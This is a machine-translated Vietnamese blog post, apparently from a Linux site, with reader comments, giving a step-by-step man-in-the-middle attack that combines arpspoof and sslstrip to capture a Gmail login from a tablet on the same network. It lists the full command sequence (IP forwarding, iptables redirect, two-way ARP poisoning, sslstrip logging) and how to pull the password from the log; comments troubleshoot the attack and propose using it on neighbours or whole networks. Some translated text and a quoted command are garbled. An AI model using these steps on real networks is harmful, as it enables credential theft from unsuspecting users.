ArpSpoofing và SSlstrip in Action.

Xin chào các Blogger.

Hôm nay, tôi có một mẫu nhỏ về mức độ nguy hiểm có thể được kết nối trong bất kỳ mạng nào mà không có bảo mật của những mạng mà rất nhiều người trong chúng ta thích.

Hôm nay, tôi sẽ sử dụng ArpSpoofing với Sslstrip để lấy mật khẩu Gmail. Để làm cho môi trường được kiểm soát tốt hơn, tôi đã tạo một tài khoản có tên "testarp@gmail.com".

Và vì tôi không thích phần mở đầu cho lắm, nên hãy bắt tay vào công việc.

Tôi không chịu trách nhiệm bất cứ lúc nào về những gì họ có thể làm với những thông tin sau. Tôi làm điều đó dành riêng cho mục đích giáo dục

MÔI TRƯỜNG

Đối với thử nghiệm này, những gì chúng tôi có như sau:

1. Kẻ tấn công: Đó là máy tính để bàn hoặc máy tính để bàn của tôi có Debian Wheezy. Từ kho bạn có thể cài đặt dải ssls y đánh hơi để có được đàn hạc

2. Nạn nhân: Nạn nhân là một máy tính bảng Android chỉ muốn xem thư của mình thông qua trình duyệt.

3. Phương tiện: Giữa là của tôi Bộ định tuyến Cisco DPC2425

CÁC ĐỊA CHỈ.

Địa chỉ của kẻ tấn công: 172.26.0.2

Địa chỉ bộ định tuyến: 172.26.0.1

Địa chỉ của Nạn nhân: 172.26.0.8

CUỘC TẤN CÔNG:

Để hiểu thêm một chút về cách thức hoạt động của cuộc tấn công, bạn có thể truy cập vào mục cũ của tôi POST

Điều đầu tiên chúng tôi sẽ làm cho cuộc tấn công này là kích hoạt chuyển tiếp để máy tính của chúng tôi có thể chuyển tiếp thông tin đến nạn nhân mà họ không nhận ra. (Nếu không nó sẽ là một cuộc tấn công từ chối dịch vụ)

Đối với điều đó, chúng tôi sẽ sử dụng:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Mỗi lệnh trong một cửa sổ điều khiển trực tiếp.

Bây giờ nếu chúng ta làm tail -f desdelinux chúng tôi thấy thông tin trực tiếp và trực tiếp

ảnh chụp nhanh1

Vậy làm thế nào để chúng ta đạt được những gì chúng ta muốn?

Đầu tiên hãy nhập thư của chúng tôi trên Máy tính bảng. Trong khi đăng nhập, chúng tôi thấy rằng hàng nghìn hàng nghìn thứ xuất hiện trên bảng điều khiển của chúng tôi.

Bây giờ nó đã hoàn tất, hãy mở tập tin của chúng tôi “desdelinux” với nano

nano desdelinux

với Control + W, chúng tôi tìm kiếm thứ gọi là BÀI ĐĂNG BẢO MẬT.

Và chúng ta sẽ thấy một cái gì đó như thế này.

ảnh chụp nhanh2

Trong số dòng khổng lồ không thể nhìn thấy đó là email và mật khẩu của nạn nhân.

Vì vậy, chúng tôi chạy sang bên phải cho đến khi chúng tôi nhìn thấy ánh sáng cuối đường hầm.

ảnh chụp nhanh3

Vào một dịp khác, chúng ta sẽ xem làm thế nào chúng ta có thể tự bảo vệ mình một chút khỏi những cuộc tấn công này.

Liên quan


Để lại bình luận của bạn

địa chỉ email của bạn sẽ không được công bố. Các trường bắt buộc được đánh dấu bằng *

*

*

  1. Chịu trách nhiệm về dữ liệu: Miguel Ángel Gatón
  2. Mục đích của dữ liệu: Kiểm soát SPAM, quản lý bình luận.
  3. Hợp pháp: Sự đồng ý của bạn
  4. Truyền thông dữ liệu: Dữ liệu sẽ không được thông báo cho các bên thứ ba trừ khi có nghĩa vụ pháp lý.
  5. Lưu trữ dữ liệu: Cơ sở dữ liệu do Occentus Networks (EU) lưu trữ
  6. Quyền: Bất cứ lúc nào bạn có thể giới hạn, khôi phục và xóa thông tin của mình.

  1.   @Jlcmux dijo

    Tôi nhân cơ hội này để nói rằng khi bài đăng được xuất bản, các lệnh không đúng.

    Lệnh iptables ở cuối thiếu 8080 nằm trên một dòng khác. Và sau đó các lệnh arpspoof đều nằm trên cùng một dòng. Mỗi lệnh nằm trên một dòng khác nhau.

    Mong tòa soạn xem và có thể sửa chữa.

    Chúc mừng.

    1.    Hướng dẫn sử dụng Nguồn dijo

      Tôi đã thực hiện các chỉnh sửa mà bạn đề cập, điều đó có ổn không?

      Nếu bạn định chèn mã vào một mục ưa thích, hãy sử dụng chế độ xem HTML và xác minh rằng bài viết là chính xác trước khi gửi nó đến trạng thái đang chờ xử lý. Cảm ơn bạn.

  2.   Luis dijo

    Thật là ớn lạnh khi biết rằng những người trong chúng ta không có kiến ​​thức lại dễ bị tổn thương như vậy. Thông tin rất tốt ngay cả khi tôi hiểu ít về chủ đề, tôi nhận ra tầm quan trọng. Cảm ơn bạn!
    Liên quan

  3.   giskard dijo

    Nhưng điều đó chỉ hoạt động nếu kẻ tấn công và nạn nhân trên cùng một mạng. Trong mọi trường hợp, tôi thấy rằng nếu (trên cùng một mạng) bạn kết nối bằng HTTPS thì điều đó không xảy ra vì dữ liệu được mã hóa TRƯỚC KHI rời khỏi máy của bạn. Nếu bạn kết nối bằng HTTP (không có S), tôi nghĩ rằng ngay cả khi nhìn vào cáp mạng, bạn sẽ thấy các phím.

    1.    @Jlcmux dijo

      Điều đó không đúng. Tôi đang hack mật khẩu gmail và nếu bạn nhận thấy gmail sử dụng https. Vì thế? Vấn đề là mặc dù https là an toàn nhưng nó phụ thuộc vào http. Vì vậy, nó không phải là quá an toàn.

      Đừng thú nhận quá nhiều về một https rằng chữ S không dành cho Siêu nhân mà là chữ "an toàn"

    2.    rten dijo

      nó hoạt động với hoặc không có https, tôi đã thử nó với một bản phân phối linux chuyên dụng hơn và nó hoạt động mà không có vấn đề gì

    3.    Hướng dẫn sử dụng Nguồn dijo

      Chính xác là bạn có thể sử dụng nó để dạy cho những kẻ ăn cắp Wi-Fi của bạn một bài học. 😀

      Nó ít nhiều giống như những gì họ đã nói cách đây rất lâu trên blog của Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    tia sáng dijo

        Ostia, thật tuyệt! / Và sau đó họ nói với tôi điều hoang tưởng mỗi khi tôi sử dụng VPN khi họ kiểm tra tài khoản ngân hàng…). Nhân tiện, bạn phải xem những người hoài nghi như thế nào trong các bình luận ... nếu cuối cùng nó ăn cắp ...

        1.    eliotime3000 dijo

          Bây giờ chúng ta cần xem hướng dẫn về cách tạo và cung cấp dịch vụ VPN của riêng bạn.

      2.    Daniel dijo

        Câu chuyện mà bạn liên kết rất thú vị, nó thậm chí có vẻ xứng đáng là một cuốn tiểu thuyết, và điều này khiến tôi nhớ lại khi tôi sử dụng internet của những người hàng xóm của mình và mặc dù tôi nói rằng tôi biết chủ đề, tôi nghĩ rằng tôi không bao giờ có thể nhìn thấy kích thước thực sự của mối nguy hiểm mà tôi có thể gặp phải, thật may mắn cho tôi, họ chỉ đổi mật khẩu thành WPA2 và đó là nơi câu chuyện của tôi với ISP bắt đầu haha

    4.    Mauritius dijo

      Đó là lý do tại sao tiêu đề nói rằng Sslstrip đang hoạt động.

      Nó hoạt động, miễn là kẻ tấn công ở giữa

  4.   lập tức dijo

    Bạn làm việc với sóng gì tại lăng kính? -.-
    không có.
    Còn chờ gì nữa hãy gửi yêu cầu của bạn XD
    liên quan
    bài tốt

  5.   auroszx dijo

    Thật thú vị, tôi sẽ làm một bài kiểm tra giáo dục sau ... Có lẽ tôi thậm chí có thể xóa mật khẩu của WiFi và giải trí một chút 😛
    Bạn có thể làm điều gì đó tương tự để gửi các trang khác nhau đến những trang mà mục tiêu yêu cầu không? Ví dụ, họ muốn mở Facebook và tôi chuyển hướng họ đến Google? 😛

    1.    @Jlcmux dijo

      Đúng. Nhưng tất cả là một cuộn rất khác.

      Có lẽ tôi sẽ đăng nó sau.

  6.   người mới cuối cùng dijo

    bài đăng rất tốt, những chủ đề này rất giáo dục, bây giờ chúng ta cần có khả năng chống lại cuộc tấn công này, vì một số (như tôi) kết nối với mạng công cộng (trường đại học chẳng hạn) sẽ rất hữu ích nếu tránh nó.

    Chúc mừng!

  7.   chỉ-người-dl-khác dijo

    Nó không hiệu quả với tôi 🙁

  8.   dijo

    Có điều gì đó không thành công với tôi ở đây, ngoài thực tế là các kết nối https được mã hóa thông qua chứng chỉ máy chủ (khi bạn có chứng chỉ trên máy của mình, trình duyệt của bạn chịu trách nhiệm mã hóa) với iptables, bạn chuyển hướng cổng 80 (http), không phải 443 , là https

    1.    @Jlcmux dijo

      Tôi cũng nghĩ vậy. Vấn đề là mặc dù https là "an toàn" nhưng không may lại phụ thuộc vào http. Vì vậy sslstrip lợi dụng điều đó khiến trình duyệt tin rằng nó đang sử dụng thông tin đăng nhập https nhưng thực tế không phải vậy.

      1.    dijo

        chết tiệt! nhưng trình duyệt sẽ thấy một cảnh báo như "chứng chỉ này đến từ một trang web đáng ngờ hoặc một cái gì đó tương tự" ... Tôi chắc chắn sẽ phải làm các bài kiểm tra XD

        1.    @Jlcmux dijo

          Không, hoàn toàn không có gì xuất hiện.

  9.   chỉ-người-dl-khác dijo

    Cuối cùng nó đã làm việc cho tôi
    Tôi được kết nối trên mạng WEP bằng mật khẩu và dù sao nó cũng hiển thị mật khẩu trực tiếp cho tôi.

    Một truy vấn. Bạn có thể thực hiện quy trình tương tự nhưng cho tất cả các máy tính được kết nối trong mạng, thay vì chỉ có một nạn nhân duy nhất?

    1.    @Jlcmux dijo

      Có bạn có thể. Nhưng tôi đã không làm thí nghiệm. Hãy tự mình thử và cho chúng tôi biết nó diễn ra như thế nào.

  10.   sinnick19 dijo

    Điều duy nhất tôi nhận được với điều này là máy của nạn nhân sẽ ngoại tuyến, nhưng sslstrip không hiển thị cho tôi bất cứ điều gì: /

    1.    @Jlcmux dijo

      Bạn nên tắt tường lửa trong giây lát. Hoặc ít nhất là kích hoạt các kết nối đến.

  11.   Ông Black dijo

    Thăm dò và tôi chỉ thấy tên người dùng và mật khẩu của trang facebook, trong gmail tôi không tìm thấy kết quả nào trong nhật ký, ngoài ra tôi chỉ cần một dòng arpspoof «arpspoof -i -t«. Mặt khác, máy nạn nhân không thể mở một số trang. Tôi sẽ tiếp tục điều tra, nó rất thú vị. Một trợ giúp cho những người sử dụng Manjaro, các gói để cài đặt là: dsniff (ở đây là arpspoff), xoắn và python2-pyopenssl. Sslstrip có thể được tải xuống từ đây: http://www.thoughtcrime.org/software/sslstrip/
    Để chạy nó $ python2 sslstrip.py
    Chúc mừng.

  12.   Ông Black dijo

    Nó không xuất hiện nhưng dòng arpspoof là: #arpspoof -i int -t ip-Nạn nhân ip-router

  13.   Gilbert dijo

    nhìn tôi làm chính xác những gì bạn nói:

    echo "1"> / proc / sys / net / ipv4 / ip_osystem iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

    arspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Vấn đề là nạn nhân, là một máy tính khác mà tôi có ở đây trong phòng của tôi, không có kết nối đến mức tôi phải khởi động lại bộ định tuyến, tôi có thể làm gì, giúp tôi.

    Một điều khác, tôi đang làm việc với một máy ảo và khi tôi thực thi lệnh iwconfig, wlan0 không xuất hiện cũng như khi tôi thực thi ifconfig, tuy nhiên, nếu tôi có internet trên máy ảo của mình, thì với giao diện eth0.